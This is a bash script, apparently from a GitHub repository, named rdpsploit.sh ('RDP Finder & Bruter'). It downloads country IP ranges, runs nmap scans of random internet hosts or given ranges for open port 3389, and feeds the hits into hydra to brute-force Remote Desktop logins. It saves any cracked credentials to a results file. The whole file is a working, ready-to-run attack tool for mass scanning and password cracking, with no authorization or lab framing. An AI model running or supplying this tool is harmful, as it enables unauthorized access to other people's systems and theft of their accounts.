-
Notifications
You must be signed in to change notification settings - Fork 84
/
rdpsploit.sh
executable file
·360 lines (344 loc) · 11.6 KB
/
rdpsploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
#!/bin/bash
# RDP Finder & Bruter Script
#
# Requires NMAP & HYDRA (w/RDP Support)
#Start the magic....
JUNK=/tmp
SCANCOUNT="$2"
STORAGE1=$(mktemp -p "$JUNK" -t fooooobar1.tmp.XXX)
STORAGE2=$(mktemp -p "$JUNK" -t fooooobar2.tmp.XXX)
#First a simple Bashtrap function to handle interupt (CTRL+C)
trap bashtrap INT
function bashtrap(){
echo
echo
echo 'CTRL+C has been detected!.....shutting down now' | grep --color '.....shutting down now'
#exit entire script if called
rm -f "$STORAGE1" 2> /dev/null
rm -f "$STORAGE2" 2> /dev/null
exit;
}
#End bashtrap()
function usage(){
echo
echo "HR's RDP Finder" | grep --color -E 'HR||s RDP Finder'
echo
echo "USAGE: $0 <ARG> <OPTION>" | grep --color 'USAGE'
echo "-G"
echo " [*] Genrate IP Range lists based on Country"
echo "-F <#>"
echo " [*] NMAP Scan of <#> random hosts checking for Enabled RDP Port"
echo "-R <IP-RANGE>"
echo " [*] NMAP Scan of <IP-RANGE> checking for Enabled RDP Port"
echo "-L </path/to/ip.lst>"
echo " [*] NMAP Scan using provided IP list (one per line) to check for Enabled RDP Port"
echo "-C"
echo " [*] Cracker Script with easy to follow prompts"
echo "-c"
echo " [*] Cracker Script with Username, IP and Password lists provided"
echo " [*] Requires -I/i, -U/u, and -P/p flags (ORDER SPECIFIC => I=>U=>P):"
echo " -U <USERNAME>"
echo " -u </path/to/users.lst>"
echo " -P </path/to/password.lst>"
echo " -p <password>"
echo " -I </path/to/ip.lst>"
echo " -i <IP>"
echo
echo "EX: $0 -G" | grep --color 'EX'
echo "EX: $0 -C" | grep --color 'EX'
echo "EX: $0 -F 1000" | grep --color 'EX'
echo "EX: $0 -R 192.168.0.0-192.168.3.255" | grep --color 'EX'
echo "EX: $0 -L /home/hood3drob1n/Desktop/ip.lst" | grep --color 'EX'
echo "EX: $0 -c -I /path/to/ip.lst -U Administrator -P /path/to/password.lst" | grep --color 'EX'
echo "EX: $0 -c -I /path/to/ip.lst -u /path/to/users.lst -P /path/to/password.lst" | grep --color 'EX'
echo "EX: $0 -c -I /path/to/ip.lst -u /path/to/users.lst -p \"P@ssw0rd1\"" | grep --color 'EX'
echo "EX: $0 -c -i 192.168.2.51 -U Administrator -P /path/to/password.lst" | grep --color 'EX'
echo "EX: $0 -c -i 192.168.2.51 -u /path/to/users.lst -P /path/to/password.lst" | grep --color 'EX'
echo
exit;
}
#End usage()
function generate_ip_range(){
if [ ! -d range_lists ]; then
mkdir range_lists
fi
echo "Please select which country to grab IP ranges for from the list below: " | grep --color 'Please select which country to grab IP ranges for from the list below'
# Grab actual list of Countries and use to present options menu to user:
curl http://services.ce3c.be/ciprg/ -s | grep "href='?countrys=" | sed -e "s/<td><font size='2'><a href='?countrys=/'/g" -e 's/<\/tr><tr>//g' -e 's/<table><tr>//g' | while read line; do awk -F"'" '{ print $2 }' | sed '/^$/d' >> "$STORAGE1"; done;
select COUNTRY in $(cat "$STORAGE1")
do
echo "OK, grabbing IP range for $COUNTRY...." | grep --color -E 'OK||grabbing IP range for';
break
done
curl http://services.ce3c.be/ciprg/?countrys=$COUNTRY -s > "$STORAGE2";
echo
echo "IP Ranges for: $COUNTRY" | grep --color 'IP Ranges for'
echo
cat "$STORAGE2" | sort | uniq | awk -F":" '{ print $2 }' | while read line
do
firstOctStart=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $1 }')
firstOctEnd=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $5 }')
secondOctStart=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $2 }')
secondOctEnd=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $6 }')
thirdOctStart=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $3 }')
thirdOctEnd=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $7 }')
fourthOctStart=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $4 }')
fourthOctEnd=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $8 }')
if [ "$firstOctStart" == "$firstOctEnd" ]; then
IP1="$firstOctStart"
else
IP1="$firstOctStart-$firstOctEnd"
fi
if [ "$secondOctStart" == "$secondOctEnd" ]; then
IP2="$secondOctStart"
else
IP2="$secondOctStart-$secondOctEnd"
fi
if [ "$thirdOctStart" == "$thirdOctEnd" ]; then
IP3="$thirdOctStart"
else
IP3="$thirdOctStart-$thirdOctEnd"
fi
if [ "$fourthOctStart" == "$fourthOctEnd" ]; then
IP4="$fourthOctStart"
else
IP4="$fourthOctStart-$fourthOctEnd"
fi
echo "$IP1.$IP2.$IP3.$IP4" >> range_lists/`echo $COUNTRY`_IP_ranges.lst
done
cat range_lists/`echo $COUNTRY`_IP_ranges.lst
echo
echo "Do you want to continue generating Country IP Lists? (y/n)" | grep --color -E 'Do you want to continue generating Country IP Lists||y||n'
read continueAnswer
echo
if [ "$continueAnswer" == 'y' ] || [ "$continueAnswer" == 'Y' ]; then
echo '' > "$STORAGE1"
echo '' > "$STORAGE2"
IP1=""
IP2=""
IP3=""
IP4=""
clear
generate_ip_range
else
clear
usage
fi
}
function rdp_find(){
if [ ! -d rdp_enabled ]; then
mkdir rdp_enabled
fi
TRACKER=0
if [ -e rdp_enabled/rdp-ip.lst ]; then
EXISTING=$(wc -l rdp_enabled/rdp-ip.lst | cut -d' ' -f1)
cat rdp_enabled/rdp-ip.lst > "$STORAGE1" 2> /dev/null
TRACKER=1
fi
echo "Please hang tight, this might take a few...." | grep --color -E 'Please hang tight||this might take a few'
echo '...'
if [ "$METH" == 3 ]; then
nmap -iL "$SCANCOUNT" -T5 -PN -p 3389 -oG "$STORAGE2" > /dev/null && grep '/open/' "$STORAGE2" |cut -d' ' -f2,4 | sed -e 's/\/open\/tcp\/\/ms-term-serv\/\/\///g' | awk '{ print $1 }' >> "$STORAGE1"
elif [ "$METH" == 2 ]; then
nmap "$SCANCOUNT" -T5 -PN -p 3389 -oG "$STORAGE2" > /dev/null && grep '/open/' "$STORAGE2" |cut -d' ' -f2,4 | sed -e 's/\/open\/tcp\/\/ms-term-serv\/\/\///g' | awk '{ print $1 }' >> "$STORAGE1"
else
nmap -iR "$SCANCOUNT" -T5 -PN -p 3389 -oG "$STORAGE2" > /dev/null && grep '/open/' "$STORAGE2" |cut -d' ' -f2,4 | sed -e 's/\/open\/tcp\/\/ms-term-serv\/\/\///g' | awk '{ print $1 }' >> "$STORAGE1"
fi
cat "$STORAGE1" | sort | uniq > rdp_enabled/rdp-ip.lst 2> /dev/null
if [ "$TRACKER" == 1 ]; then
UPDATED=$(wc -l "$STORAGE1" | cut -d' ' -f1)
FOUNDED=$(($UPDATED-$EXISTING))
echo
echo "Total in List: $UPDATED" | grep --color 'Total in List'
echo "Just Found: $FOUNDED" | grep --color 'Just Found'
echo
cat rdp_enabled/rdp-ip.lst
else
FOUNDED=$(wc -l rdp_enabled/rdp-ip.lst | cut -d' ' -f1)
echo
echo "Just Found: $FOUNDED" | grep --color 'Just Found'
echo
cat rdp_enabled/rdp-ip.lst
fi
echo
echo "What now?" | grep --color 'What now'
select continue_options in "Awaken the Crackin" "Scan Random Hosts" "Exit"
do
case $continue_options in
"Awaken the Crackin")
clear
METH=n00ber
rdp_cracker
;;
"Scan Random Hosts")
echo
echo "How many random hosts to scan now?" | grep --color 'How many random hosts to scan now'
read SCANCOUNT
echo
METH=1
clear
rdp_find
;;
Exit)
echo
echo "All done here, hope you found enough open ports....." | grep --color -E 'All done here||hope you found enough open ports'
echo
exit
;;
*)
echo
;;
esac
done
}
#End rdp_find()
function rdp_cracker(){
if [ ! -d rdp_results ]; then
mkdir rdp_results
fi
if [ "$METH" == n00ber ]; then
echo
echo "Before we awaken the crackin we must get some info..." | grep --color 'Before we awaken the crackin we must get some info'
echo "Checking for default rdp_enabled/rdp-ip.lst file...." | grep --color -E 'Checking for default rdp||enabled||rdp||ip||lst file'
if [ ! -e rdp_enabled/rdp-ip.lst ]; then
echo '...'
echo "Can't find rdp-ip.lst file! Please provide path to ip list to use: " | grep --color -E 'Can||t find rdp||ip||lst file||Please provide path to ip list to use'
read IPLIST
ghi="-M $IPLIST"
echo
else
echo '...'
echo '......found!' | grep 'found'
IPLIST=rdp_enabled/rdp-ip.lst
ghi="-M $IPLIST"
echo
fi
echo "Please provide username to attack: " | grep --color 'Please provide username to attack'
read RDPNAME
abc="-l $RDPNAME"
echo
echo "Please provide path to password list to use for cracking: " | grep --color 'Please provide path to password list to use for cracking'
read PASSLIST
if [ ! -r "$PASSLIST" ]; then
echo
echo "Can't read provided password list! Please check path or permissions and try again...." | grep --color -E 'Can||t read provided password list||Please check path or permissions and try again'
echo
cracker
fi
def="-P $PASSLIST"
if [ -e rdp_results/rdp.results ]; then
mv rdp_results/rdp.results "rdp_results/rdp.results_`date +%Y%m%d%H`.bk"
fi
fi
echo
echo "OK, now let us awaken the crackin....." | grep --color -E 'OK||now let us awaken the crackin'
echo "Hang tight, this will take a few...." | grep --color -E 'Hang tight||this will take a few'
hydra -v $abc $def $ghi rdp -e ns -t 10 -W 3 -f -o "$STORAGE1" 2> /dev/null
echo
echo "Results:" | grep --color 'Results'
cat "$STORAGE1" | while read line
do
echo $line | awk -F"3389" '{ print $2 }' | sed -e 's/\]\[rdp\] //g' | grep --color -E 'host||login||password'
echo $line | awk -F"3389" '{ print $2 }' | sed -e 's/\]\[rdp\] //g' >> rdp_results/rdp.results
done
echo
echo "The crackin has gone to rest, check the rdp.results file for the full details...." | grep --color -E 'The crackin has gone to rest||check the rdp||results file for the full details'
}
#MAIN-----------------------------------------------------
clear
#Check to ensure arguments passed or provide usage info for dummies
if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ]; then
usage
fi
if [ -e hydra.restore ]; then
rm -f hydra.restore 2> /dev/null
fi
while getopts ":F:R:L:c:G,C" usage_options;
do
case $usage_options in
F)
METH=1
rdp_find
;;
R)
METH=2
rdp_find
;;
L)
if [ ! -r "$SCANCOUNT" ]; then
echo
echo "Can't read provided IP list file! Check path or permissions and re-try....." | grep --color -E 'Can||t read provided IP list file||Check path or permissions and re||try'
echo
exit;
else
METH=3
rdp_find
fi
;;
C)
METH=n00ber
rdp_cracker
;;
c)
METH=advanced
if [ $# -lt 7 ]; then
echo
echo "This option requires -U/u, -P/p and -I/i options to work, please review usage and re-run script...." | grep --color -E 'This option requires||U||u||P||p and||I||i options to work||please review usage and re||run script'
echo
usage
fi
if [ "$2" == "-I" ]; then
IPLIST="$3"
if [ ! -r "$IPLIST" ]; then
echo
echo "Can't read provided IP list! Please check path or permissions and try again...." | grep --color -E 'Can||t read provided IP list||Please check path or permissions and try again'
echo
usage
fi
ghi="-M $IPLIST"
elif [ "$2" == "-i" ]; then
IPLIST="$3"
ghi="$IPLIST"
fi
if [ "$4" == "-U" ]; then
RDPNAME="$5"
abc="-l $RDPNAME"
elif [ "$4" == "-u" ]; then
RDPNAME="$5"
abc="-L $RDPNAME"
fi
if [ "$6" == "-P" ]; then
PASSLIST="$7"
if [ ! -r "$PASSLIST" ]; then
echo
echo "Can't read provided password list! Please check path or permissions and try again...." | grep --color -E 'Can||t read provided password list||Please check path or permissions and try again'
echo
fi
def="-P $PASSLIST"
elif [ "$6" == "-p" ]; then
PASSLIST="$7"
def="-p $PASSLIST"
fi
if [ -e rdp_results/rdp.results ]; then
mv rdp_results/rdp.results "rdp_results/rdp.results_`date +%Y%m%d%H`.bk"
fi
rdp_cracker
;;
G)
echo
generate_ip_range
;;
*)
usage
;;
esac
done
echo
echo
echo "All done here, hope you found what you were looking for....." | grep --color -E 'All done here||hope you found what you were looking for'
echo
echo "Until next time, Enjoy!" | grep --color -E 'Until next time||Enjoy'
echo
rm -f "$STORAGE1" 2> /dev/null
rm -f "$STORAGE2" 2> /dev/null
#EOF